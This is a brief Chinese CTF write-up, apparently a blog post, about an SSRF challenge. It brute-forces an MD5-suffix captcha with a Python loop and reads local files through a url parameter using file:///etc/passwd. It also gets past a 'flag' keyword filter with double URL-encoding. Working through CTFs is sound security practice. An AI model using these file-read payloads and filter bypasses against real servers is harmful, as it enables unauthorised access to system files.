首先看一下md5截断:
substr(md5(captcha), -6, 6) == "4c3d26",表示从字符串倒数第6位开始,往后截取6位 captcha是验证码的意思,一般是数字,所以可以直接爆破数字
import hashlib for i in range(1000000): if hashlib.md5(str(i).encode()).hexdigest().endswith('15f494'): print(i)
对于url参数,传file:///etc/passwd有回显,传file:///flag被拦截,很明显是过滤了flag关键字,我看WP里面写的都是url编码绕过,我感觉他们说的应该是URL16进制加密编码,在线工具
传参?url=file:///%66%6c%61%67还是会被拦截,把%再加密一下变成%25,传参?url=file:///%2566%6c%61%67,或者加密任何一个数字或字母也行。
标签:ME,攻防,加密,SSRF,url,file,传参,md5 From: https://www.cnblogs.com/hackerone/p/17561657.html